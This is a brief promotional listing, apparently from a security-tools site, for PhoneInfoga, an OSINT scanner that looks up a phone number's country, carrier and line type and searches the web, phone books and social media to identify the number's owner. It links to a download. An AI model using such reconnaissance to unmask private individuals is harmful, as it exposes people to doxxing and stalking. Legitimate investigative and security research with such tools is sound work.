PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone number with very good accuracy, then search for footprints on search engines to try to find the VoIP provider or identify the owner.

Features
- Check if a phone number exists and is possible
- Gather standard information such as country, line type, and carrier
- OSINT footprinting using external APIs, Google Hacking, phone books & search engines
- Check for reputation reports, social media, disposable numbers and more
- Scan several numbers at once
- Use custom formatting for more effective OSINT reconnaissance
- Automatic footprinting on several custom formats

Download PhoneInfoga

Link: http://www.kitploit.com/2019/06/phoneinfoga-advanced-information.html